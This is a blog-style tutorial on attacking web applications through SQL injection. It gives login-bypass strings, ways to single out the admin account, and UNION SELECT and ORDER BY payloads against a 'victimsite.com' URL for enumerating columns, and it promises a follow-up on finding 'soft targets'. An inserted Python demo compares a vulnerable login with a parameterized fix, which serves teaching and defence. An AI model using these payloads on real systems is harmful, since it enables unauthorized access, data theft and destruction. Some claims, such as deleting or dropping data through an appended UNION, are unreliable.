As of today it is hard to find SQL injection vulnerabilities in web applications, but if you find one, here are some basic methods to exploit it. SQL injection vulnerabilities can be exploited through login forms, search boxes, product pages and URLs. Login forms and search boxes can be checked for the vulnerability by typing strings of the following pattern,
'a' = 'a'
'c' = 'b'
or just
'' = ''
If the application responds with an error related to SQL syntax, then it most likely can be exploited. The very first step would be bypassing the login; to bypass the login, try strings of the following patterns in both the username and password fields,
' OR '1' = '1
' OR 'a' = 'a
password: ' or 1=1--
something' OR '1' = '1'
something' OR 'a' = 'a'
login: ' OR 'a' = 'a'
If the web application is vulnerable, you will most likely be logged in as the very first user entry in the database. Most of the time the first user is the database admin, and thus you get control over the complete database. If the first user is not the database admin, you can search for it. For example, if the first user entries belong to the users Max, Adrian, James and Will and none of them is admin, then you have to try queries in the following way,
' OR '1' = '1' and firstname <> Max and firstname <> Adrian and firstname <> James
' OR '1' = '1' and uname <> Max and uname <> Adrian and uname <> James
' OR '1' = '1' and username <> Max and username <> Adrian and username <> James
' OR '1' = '1' and fname <> Max and fname <> Adrian and fname <> James
Here you have to replace firstname, uname, username and fname with the name of the username field. Sometimes it is not at all compulsory to look for the admin username, because sometimes the database admin forgets to change the permissions of other users, thus allowing every user full access to the database.
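The login bypass above works only because the application pastes the submitted values into the SQL text. The following is an added example, not code from the original post, that puts such a vulnerable login function next to its parameterized fix on a constructed in-memory SQLite table (the user names, passwords and table layout are invented for the demonstration). It also shows why the post says to put the payload in both fields: AND binds tighter than OR, so a payload in the username alone still has to satisfy the password check.

```python
import sqlite3

# Constructed demo table: three users, the first row being the administrator,
# which is why an "OR '1'='1'" bypass lands on that account. Passwords are
# stored in clear text only to keep the demonstration short.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
        [("admin", "s3cret", 1), ("max", "hunter2", 0), ("adrian", "letmein", 0)],
    )
    return conn


def rendered_query(username, password):
    # The statement the vulnerable version actually sends to the database.
    return (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )


def login_vulnerable(conn, username, password):
    # Classic defect: the submitted values become part of the SQL text.
    # With "' OR '1'='1" in both fields the WHERE clause reads
    #   username = '' OR '1'='1' AND password = '' OR '1'='1'
    # which is true for every row, so the first row (admin) is returned.
    row = conn.execute(rendered_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    # Fix: placeholders keep the input as data, so a quote in the value can
    # never terminate the string literal or add a new condition.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "' OR '1'='1"
    db = build_db()
    print(rendered_query(payload, payload))
    print("vulnerable, payload in username only ->", login_vulnerable(db, payload, "x"))
    print("vulnerable, payload in both fields   ->", login_vulnerable(db, payload, payload))
    print("parameterized, payload in both fields ->", login_parameterized(db, payload, payload))
```

Running it shows the vulnerable function logging in as admin when the payload is in both fields, returning nothing when it is only in the username (the AND on the password still fails), and the parameterized function rejecting the payload in every case.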
Once you are in, your next step would be checking the number of columns. For that you first have to find a URL of the type,
www.victimsite.com/page.asp?id=12
or, put simply, a URL which ends with the following pattern,
id=num
Where num can be any number or string. Now, to check for the vulnerability, append a single apostrophe to the number,
www.victimsite.com/page.asp?id=12'
If it returns an error then it is very likely vulnerable to further exploitation. Append the vulnerable URL with the following queries,
' UNION SELECT NULL--
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
The final URLs will appear as follows,
www.victimsite.com/page.asp?id=12' UNION SELECT NULL--
www.victimsite.com/page.asp?id=12' UNION SELECT NULL, NULL--
www.victimsite.com/page.asp?id=12' UNION SELECT NULL, NULL, NULL--
Increase the number of NULLs until the query executes successfully. Another way to find the number of columns is to check with an ORDER BY query,
www.victimsite.com/page.asp?id=12' ORDER BY 1
www.victimsite.com/page.asp?id=12' ORDER BY 2
www.victimsite.com/page.asp?id=12' ORDER BY 3
www.victimsite.com/page.asp?id=12' ORDER BY 4
All of these queries are likely to return the same result; the number of columns is confirmed when you get an error message. Your next step would be to find which column accepts the string data type. For example, consider a table with four columns; to find the string column, append the URL with,
' UNION SELECT 'a', NULL, NULL, NULL--
' UNION SELECT NULL, 'a', NULL, NULL--
' UNION SELECT NULL, NULL, 'a', NULL--
' UNION SELECT NULL, NULL, NULL, 'a'--
The query which returns a page with an extra column showing 'a' identifies the column to use for extracting further data.
Once all the above steps are done, you can extract, delete or insert data using SELECT, INSERT, UPDATE, DELETE and DROP queries by appending them to the exploit URL with UNION.
All the steps we discussed so far are with respect to MySQL; the syntax may vary a little for other databases, so it is better to grab the name and version of the database using banner grabbing before performing an attack.
You can create several variations of the same queries to perform SQL injection attacks. There are free and automated tools which can perform SQL injection attacks. As you can see, performing a manual SQL injection is a really tedious job, so in our next post we will first discuss how to find soft targets for SQL injection and then exploit them using SQL injection tools.